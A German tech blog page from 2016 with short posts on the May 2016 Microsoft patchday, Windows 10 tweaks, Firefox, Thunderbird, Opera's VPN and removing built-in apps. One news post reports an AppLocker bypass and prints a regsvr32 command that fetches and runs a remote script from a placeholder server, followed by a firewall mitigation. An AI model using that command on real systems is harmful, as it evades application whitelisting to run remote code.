Antary

Microsoft-Patchday Mai 2016

Microsoft Logo

Heute ist der zweite Dienstag im Monat, was so viel bedeutet, dass heute wieder Microsoft-Patchday ist. Im Mai 2016 stehen insgesamt 16 sicherheitsrelevante Updates zur Installation bereit. Ja, irgendwie scheinen es jeden Monat mehr zu werden 😉 Davon werden acht als „kritisch“ und acht als „wichtig“ eingestuft.

Weitere Details stellt Microsoft wie immer im Security TechCenter zur Verfügung.

Bulletin ID Bulletin Title Maximum Severity Rating and Vulnerability Impact Restart Requirement Affected Software
MS16-051 Cumulative Security Update for Internet Explorer (3155533) Critical
Remote Code Execution
Requires restart Internet Explorer on all supported editions of Microsoft Windows.
MS16-052  Cumulative Security Update for Microsoft Edge (3155538) Critical
Remote Code Execution
Requires restart Microsoft Edge on Windows 10.
MS16-053  Cumulative Security Update for JScript and VBScript (3156764) Critical
Remote Code Execution
May require restart Windows Vista, Windows Server 2008, and Windows Server 2008 R2.
MS16-054  Security Update for Microsoft Office (3155544) Critical
Remote Code Execution
May require restart Microsoft Office 2007, Office 2010, Office 2013, Office 2013 RT, Office 2016, Office for Mac 2011, Office 2016 for Mac, Office Compatibility Pack, Word Viewer, SharePoint Server 2010, and Office Web Apps 2010.
MS16-055  Security Update for Microsoft Graphics Component (3156754) Critical
Remote Code Execution
Requires restart All supported editions of Microsoft Windows.
MS16-056  Security Update for Windows Journal (3156761) Critical
Remote Code Execution
May require restart Windows Vista, Windows 7, Windows 8.1, Windows RT 8.1, and Windows 10.
MS16-057  Security Update for Windows Shell (3156987) Critical
Remote Code Execution
Requires restart Windows 8.1, Windows Server 2012 R2, Windows RT 8.1, and Windows 10.
MS16-058  Security Update for Windows IIS (3141083) Important
Remote Code Execution
Requires restart Windows Vista and Windows Server 2008.
MS16-059  Security Update for Windows Media Center (3150220) Important
Remote Code Execution
May require restart Windows Vista, Windows 7, and Windows 8.1.
MS16-060  Security Update for Windows Kernel (3154846) Important
Elevation of Privilege
Requires restart All supported editions of Microsoft Windows.
MS16-061  Security Update for Microsoft RPC (3155520) Important
Elevation of Privilege
Requires restart All supported editions of Microsoft Windows.
MS16-062  Security Update for Windows Kernel-Mode Drivers (3158222) Important
Elevation of Privilege
Requires restart All supported editions of Microsoft Windows.
MS16-064  Security Update for Adobe Flash Player (3157993) Critical
Remote Code Execution
Requires restart Windows 8.1, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1, and Windows 10.
MS16-065  Security Update for .NET Framework (3156757) Important
Information Disclosure
May require restart Microsoft .NET Framework 2.0 Service Pack 2, .NET Framework 3.5, .NET Framework 3.5.1, .NET Framework 4.5.2, .NET Framework 4.6, and .NET Framework 4.6.1 on affected releases of Microsoft Windows.
MS16-066  Security Update for Virtual Secure Mode (3155451) Important
Security Feature Bypass
Requires restart Windows 10 and Windows 10 version 1511.
MS16-067  Security Update for Volume Manager Driver (3155784) Important
Information Disclosure
May require restart Windows 8.1, Windows Server 2012, Windows Server 2012 R2, and Windows RT 8.1.

Kategorien: Windows

„Apps deaktivieren, um die Leistung zu verbessern“-Meldung im Info-Center unter Windows 10 deaktivieren

Windows 10 Logo

Unter Windows 10 wird im Info-Center eine Meldung angezeigt, wenn mindestens drei neue Apps automatisch gestartet und im Hintergrund ausgeführt werden: „Apps deaktivieren, um die Leistung zu verbessern“.

Dieser Hinweis ist für viele Nutzer störend und könnte den ein oder anderen auch verwirren. Glücklicherweise kann er relativ einfach entfernt werden.

Die Meldung wird durch eine geplante Aufgabe angestoßen, die ihr ohne Probleme deaktivieren könnt. Ihr findet die Aufgabe in der Aufgabenplanung unter „Windows“, „Application Experience“ und „StartupAppTask“. Dort müsst ihr die Aufgabe deaktivieren. Ab dem nächsten Neustart sollte die nervige Meldung nicht mehr erscheinen.

 

Natürlich kann der Task auch automatisch via Skript deaktiviert werden, beispielsweise via Gruppenrichtlinie oder nach der Installation des Betriebssystems. Dazu wird eine Eingabeaufforderung („cmd.exe“) mit Administrationsrechten benötigt:

schtasks /Change /TN "\Microsoft\Windows\Application Experience\StartupAppTask" /DISABLE

Bei einigen wenigen Usern soll das Deaktivieren der Aufgabe angeblich keine Abhilfe schaffen. In diesem Fall soll aber die zweite Methode erfolgreich sein. Dazu müsst ihr in der Systemsteuerung den Punkt „Sicherheit und Wartung“ öffnen. Mit einem Klick auf „Meldungen zu Start-Apps deaktivieren“ könnt ihr die störende Meldung ebenfalls eliminieren. Allerdings funktioniert dieser Tipp erst, sobald die Meldung im Info-Center erschienen ist.

Windows Server 2016 Technical Preview 5 verfügbar

Windows Server 2016 Logo

Microsoft hat eine Testversion von Windows Server 2016 veröffentlicht. Die Technical Preview 5 steht sowohl im MSDN, als auch im TechNet Evaluation Center zum Download bereit.

Die Neuerungen der TP5 hat Microsoft im TechnNet bekannt gegeben. Die frei erhältliche Testversion kann als ISO oder als Nano-Server-VHD heruntergeladen werden. Beide Varianten sind bis zum 31. Dezember 2016 lauffähig. Die finale Version von Windows Server 2016 ist für den Herbst geplant.

Download Windows Server Technical Preview 5

Kategorien: Software & Apps Windows

Neuerungen von Firefox 46

Firefox Logo 23+

Gestern wurde Firefox 46 veröffentlicht. Ursprünglich sollte Version 46 bereits am 19. April erscheinen, wurde von Mozilla dann jedoch um eine Woche verschoben. Grund hierfür waren Probleme mit der Multiprozess-Architektur Electrolysis (e10s), welche nun erst mit Firefox 48 in die finale Version Einzug halten soll. Dadurch sind in Version 46 so gut wie keine nennenswerten Neuerungen enthalten. Firefox 47 ist aber nach wie vor für den 07. Juni 2016 geplant.

  • Flüssigeres Scrollen durch Asynchronous Panning and Zooming (APZ)
  • Erhöhte Sicherheit für JIT-Compiler dank W^X-Protection (Write XOR Execute)
  • Linux-Version unterstützt GTK+ 3.
  • WebRTC-Implementierung ist zuverlässiger und bietet mehr Performance
  • Web-Crypto-API unterstützt HKDF
  • Behebung diverser Sicherheitslücken

Download Firefox 46
Download Firefox 46 (64 Bit)
Portable Firefox 46 @ Horst Scheuer

Thunderbird 45: Neue E-Mail standardmäßig mit Absatz-Formatierung

Mozilla Thunderbird Logo

Am 12. April wurde Mozilla Thunderbird in Version 45 veröffentlicht. Mozilla hat sich Ende 2012 aus der aktiven Weiterentwicklung zurückgezogen und beschränkt sich seitdem nur noch auf Stabilitäts- und Sicherheitsaktualisierungen. Neue Funktionen werden nur noch von freien Entwicklern implementiert. Dennoch bringt Thunderbird 45 einige Neuerungen mit sich, die im Changelog aufgeführt werden.

Unter anderem heißt es da:

Return/Enter in composer will now insert a new paragraph by default (shift-Enter will insert a line break)

Genau diese Änderung hat mich in den letzten Tagen ziemlich genervt. Beim Erstellen eines Zeilenumbruchs mit der Enter-Taste wird automatisch immer eine Leerzeile angefügt. Dies kommt daher, dass die Formatierung ab Thunderbird 45 automatisch auf „Absatz“ steht. Für eine neue Zeile muss fortan Shift + Enter gedrückt werden.

Glücklicherweise lässt sich dieses Verhalten aber deaktivieren. Als erstes müsst ihr hierzu im Menü unter „Extras“ die „Einstellungen“ öffnen. Anschließend auf „Verfassen“ und „Allgemein“ klicken. Zuletzt muss das Häkchen bei „Eingabetaste erzeugt neuen Absatz, falls Formatierung „Absatz“ verwendet wird“ entfernt werden (siehe Screenshot).

Fortan werden neue E-Mails standardmäßig wieder mit der Formatierung „Normaler Text“ erstellt. Damit verhält sich Thunderbird 45 wieder wie die Versionen davor.

Windows-Schwachstelle erlaubt Umgehung von AppLocker

Microsoft Logo

Das Sicherheitsfeature AppLocker wurde mit Windows 7 eingeführt (nur bei Enterprise bzw. Ultimate vorhanden) und kommt hauptsächlich in Unternehmen zum Einsatz. AppLocker ermöglicht die Steuerung von Anwendungen, App-Paketen, DLLs und Skripten. Damit lassen sich beispielsweise bestimmte Programme auf Black- oder Whitelists setzen. In letzter Zeit wird AppLocker auch häufig gegen Malware und Ransomware eingesetzt, um ungewünschte Aktivitäten auf Systemen zu blockieren. Allerdings wurde jetzt eine Schwachstelle bekannt, wie sich die AppLocker-Ausführungsregeln relativ leicht umgehen lassen.

Der Sicherheitsforscher Casey Smith hat eine Schwachstelle entdeckt, wobei AppLocker mit Hilfe des Befehlszeilenprogramms „Regsvr32“ (Microsoft Register Server) ausgehebelt werden kann. Regsvr32 wird üblicherweise zum Registrieren von DLL-Dateien verwendet, was im Normalfall allerdings Administratorrechte erfordert. Jetzt kommt der spannende Punkt: Wenn man dem Register Server eine JavaScript- oder VBScript-Datei übergibt, wird diese ohne weitere Nachfrage ausgeführt. Auch AppLocker greift hierbei nicht und es werden auch keine Administratorrechte angefordert.

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Mit dieser Technik lassen sich auch Skripte über HTTP oder HTTPS nachladen, da Regsvr32 auch URLs akzeptiert. Da keine Änderungen an der Registry durchgeführt werden, ist ein Missbrauch auch relativ schwer zu erkennen. Bei Github existiert ein Proof of Concept mit einigen Beispiel-Skripten.

Microsoft wurde bereits über das Problem informiert, hat sich aber noch nicht zu Wort gemeldet. Bis dahin kann „regsvr32.exe“ über die Windows Firewall blockiert werden, sodass zumindest eine Ausführung über das Netzwerk verhindert werden kann.

Opera zukünftig mit integriertem VPN

Opera Logo

Mit Opera 15 hat das norwegische Unternehmen Opera  Mitte 2013 einen Neuanfang gewagt. Der proprietäre Browser Opera 12 wurde eingestellt und durch einen neuen, auf Chromium basierenden Browser ersetzt. Mittlerweile ist der Browser bei Version 36 angekommen und hat sich trotz einiger Anfangsprobleme durchaus zum Guten entwickelt. Dennoch fristet er nur noch ein Nischendasein.

In der aktuellen Entwicklerversion 38 hat Opera ein interessantes Feature spendiert bekommen: eine kostenfreie VPN-Lösung ohne Begrenzung beim Datenvolumen. Standardmäßig ist die neue Funktion deaktiviert und muss erst in den Einstellungen unter dem Punkt „Datenschutz & Sicherheit“ aktiviert werden.

Opera VPN aktivieren

Der VPN-Dienst wird von der Opera-Tochter SurfEasy bereitgestellt, welche bisher nur eine kostenpflichtige VPN-Lösung anbietet. Die in Opera eingebaute VPN-Lösung ist dagegen völlig kostenfrei und auch ohne Anmeldung nutzbar.

Nach dem aktivieren der VPN-Funktion lässt sich die Nutzung über einen Klick in die Adressleiste steuern. Von dort kann das VPN jederzeit ein- und ausgeschaltet werden. Darüber hinaus lassen sich hier auch das verbrauchte Datenvolumen einsehen und der virtuelle Standort festlegen. Aktuell werden Deutschland, Kanada und die USA angeboten. Opera verspricht in Zukunft weitere Standorte zu ergänzen.

Opera VPN

In einem kurzen Test haben die VPN-Funktion und der Standortwechsel einwandfrei funktioniert. Je nach gewähltem Standort war die Verbindung aber relativ langsam, wodurch die Lösung aktuell weniger für YouTube, sondern eher zum Surfen geeignet ist. Hier wird Opera in Zukunft sicher noch nachbessern. Die native Verzahnung mit dem Browser und die einfache Bedienung haben mir aber sehr gut gefallen. Fairerweise sollte ich noch erwähnen, dass es sich eher um einen Proxy-ähnlichen Dienst handelt, der nur für den Browser funktioniert. Eine richtige VPN-Lösung agiert systemweit und kann von jeglicher Software genutzt werden.

In den nächsten Wochen dürfte die VPN-Funktion auch in der Betaversion verfügbar sein, bevor sie dann für die finale Version freigegeben wird.

Download Opera Developer

Windows 10: Microsoft Edge entfernen

Microsoft Edge Logo

Microsoft Edge ist der neue Standardbrowser unter Windows 10. Doch viele Benutzer können mit dem Browser nichts anfangen, da noch einige wichtige Funktionen fehlen, er sich nur spärlich konfigurieren lässt, einige Webseiten nur mit Darstellungsfehlern angezeigt werden und er alles in allem unfertig wirkt. Zu allem Überfluss kommt Microsoft Edge als sogenannte System-App daher, die sich leider nicht deinstallieren lässt, auch nicht per PowerShell. Allerdings existiert ein Weg, wie man Edge deaktivieren bzw. entfernen kann.

Hierzu öffnet ihr den Explorer und navigiert zum Ordner „C:\Windows\SystemApps„. Dort befinden sich alle System-Apps von Windows 10. Zur Deaktivierung müsst ihr den Ordner der entsprechenden App einfach nur umbenennen. Alternativ kann der Ordner auch gelöscht werden, was ich jedoch nicht empfehlen würde. Der Ordner für Edge besitzt die Bezeichnung „Microsoft.MicrosoftEdge_8wekyb3d8bbwe“.

Microsoft Edge entfernen

Im Grunde seid ihr nun schon fertig. Durch die Umbenennung kann Windows den Edge-Ordner nicht mehr finden. Im Startmenü und der Suche bleibt Edge weiterhin sichtbar, lässt sich aber nicht mehr starten. Des Weiteren besteht die Möglichkeit, dass Microsoft Edge mit einem zukünftigen Windows Update wieder aktiviert werden könnte.

Insgesamt ist die oben beschriebene Methode also nur ein halb garer Versuch zur Deinstallation von Edge. Viel mehr ist derzeit aber nicht möglich.

Windows 10 Apps entfernen

Windows 10 Logo

Es existieren mehrere Möglichkeiten um Apps unter Windows 10 zu entfernen. So können sie unter anderem direkt im Startmenü, über die Einstellungen (System, Apps & Features) oder im Windows Store deinstalliert werden. Allerdings funktioniert diese Vorgehensweise nicht bei vorinstallierten Apps. Diese sind in Windows 10 integriert und lassen sich nicht über die oben genannten Wege entfernen. Wie unter Windows 8.1 lautet die Lösung PowerShell.

Einzelne Apps unter Windows 10 entfernen

Zuerst muss die PowerShell mit Administratorrechten gestartet werden. Anschließend können die einzelnen Apps mit folgenden Befehlen deinstalliert werden.

3D Builder deinstallieren

Get-AppxPackage *3d* | Remove-AppxPackage

Alarm & Uhr deinstallieren

Get-AppxPackage *windowsalarms* | Remove-AppxPackage

Begleiter für Telefon deinstallieren

Get-AppxPackage *windowsphone* | Remove-AppxPackage

Erste Schritte deinstallieren

Get-AppxPackage *getstarted* | Remove-AppxPackage

Filme & TV deinstallieren

Get-AppxPackage *zunevideo* | Remove-AppxPackage

Finanzen deinstallieren

Get-AppxPackage *bingfinance* | Remove-AppxPackage

Food & Drink deinstallieren

Get-AppxPackage *bingfood* | Remove-AppxPackage

Fotos deinstallieren

Get-AppxPackage *photos* | Remove-AppxPackage

Gesundheit & Fitness deinstallieren

Get-AppxPackage *binghealth* | Remove-AppxPackage

Groove-Musik deinstallieren

Get-AppxPackage *zunemusic* | Remove-AppxPackage

Kalender & Mail deinstallieren

Get-AppxPackage *windowscommunicationsapps* | Remove-AppxPackage

Kamera deinstallieren

Get-AppxPackage *windowscamera* | Remove-AppxPackage

Karten deinstallieren

Get-AppxPackage *windowsmaps* | Remove-AppxPackage

Kontakte deinstallieren

Get-AppxPackage *people* | Remove-AppxPackage

Microsoft Solitaire Collection deinstallieren

Get-AppxPackage *solitairecollection* | Remove-AppxPackage

Microsoft Wi-Fi deinstallieren

Get-AppxPackage *connectivitystore* | Remove-AppxPackage

Nachrichten deinstallieren

Get-AppxPackage *bingnews* | Remove-AppxPackage

Nachrichten deinstallieren

Get-AppxPackage *messaging* | Remove-AppxPackage

Office holen deinstallieren

Get-AppxPackage *officehub* | Remove-AppxPackage

OneNote deinstallieren

Get-AppxPackage *onenote* | Remove-AppxPackage

Reader deinstallieren

Get-AppxPackage *reader* | Remove-AppxPackage

Reading List deinstallieren

Get-AppxPackage *reading* | Remove-AppxPackage

Rechner deinstallieren

Get-AppxPackage *windowscalculator* | Remove-AppxPackage

Skype UWP Preview deinstallieren

Get-AppxPackage *skypeapp* | Remove-AppxPackage

Sport deinstallieren

Get-AppxPackage *bingsports* | Remove-AppxPackage

Sprachrekorder deinstallieren

Get-AppxPackage *soundrecorder* | Remove-AppxPackage

Store deinstallieren

Get-AppxPackage *windowsstore* | Remove-AppxPackage

Sway deinstallieren

Get-AppxPackage *sway* | Remove-AppxPackage

Telefon deinstallieren

Get-AppxPackage *commsphone* | Remove-AppxPackage

Travel deinstallieren

Get-AppxPackage *bingtravel* | Remove-AppxPackage

Wetter deinstallieren

Get-AppxPackage *bingweather* | Remove-AppxPackage

Xbox deinstallieren

Get-AppxPackage *xboxapp* | Remove-AppxPackage

Die oben aufgeführten Befehle deinstallieren die Apps nur für den aktuell verwenden Benutzeraccount. Möchte man die Apps für alle Benutzer deinstallieren, muss jeweils noch „-allusers“ angefügt werden. Hier ein Beispiel:

Get-AppxPackage -allusers *getstarted* | Remove-AppxPackage

Alle Apps unter Windows 10 entfernen

Die Apps sind unter Windows 10 noch tiefer mit dem System verbunden, wie unter Windows 8.1. Aus diesem Grund sollte man die Apps nur löschen, wenn man dies als unbedingt notwendig erachtet und die möglichen Komplikationen vor Augen hat. Es können unter anderem Probleme mit dem Startmenü, Cortana oder den Benachrichtigungen entstehen. Außerdem kann das Entfernen der Standard-Apps bei zukünftigen Windows Updates zu Problemen führen.

Anstatt alle installierten Apps einzeln zu entfernen, können sie auch mit einem einzigen Befehl deinstalliert werden:

Get-AppxPackage | Remove-AppxPackage

Während der oben genannte Befehl nur für den aktuell angemeldeten Benutzer gilt, existiert natürlich auch das Pendant für alle User:

Get-AppxPackage -allusers | Remove-AppxPackage

Zudem lassen sich die Apps auch aus dem Windows-Image entfernen, d.h. neu angelegte Benutzerkonten werden ohne Apps angelegt.

Get-AppXProvisionedPackage -online | Remove-AppxProvisionedPackage -online

Windows 10 Standard Apps wieder installieren

Wer die Standard Apps von Windows 10 wieder installieren möchte kann diesen Befehl nutzen:

Get-AppxPackage -AllUsers| Foreach {Add-AppxPackage -DisableDevelopmentMode -Register "$($_.InstallLocation)\AppXManifest.xml"}

BIOS- bzw. UEFI-Version unter Windows anzeigen

Möchte man die BIOS- bzw. UEFI-Version eines PCs oder Servers herausfinden, funktioniert das natürlich über einen Neustart und einem Blick ins BIOS bzw. UEFI. Alternativ kann man die aktuelle Version auch über diverse Tools auslesen, beispielsweise AIDA64. Doch das funktioniert auch einfacher.

Auf PCs mit Windows kann die BIOS- bzw. UEFI-Version über die Eingabeaufforderung (CMD) angezeigt werden. Dazu muss folgender Befehl eingegeben werden:

wmic bios get smbiosbiosversion

Kategorien: Windows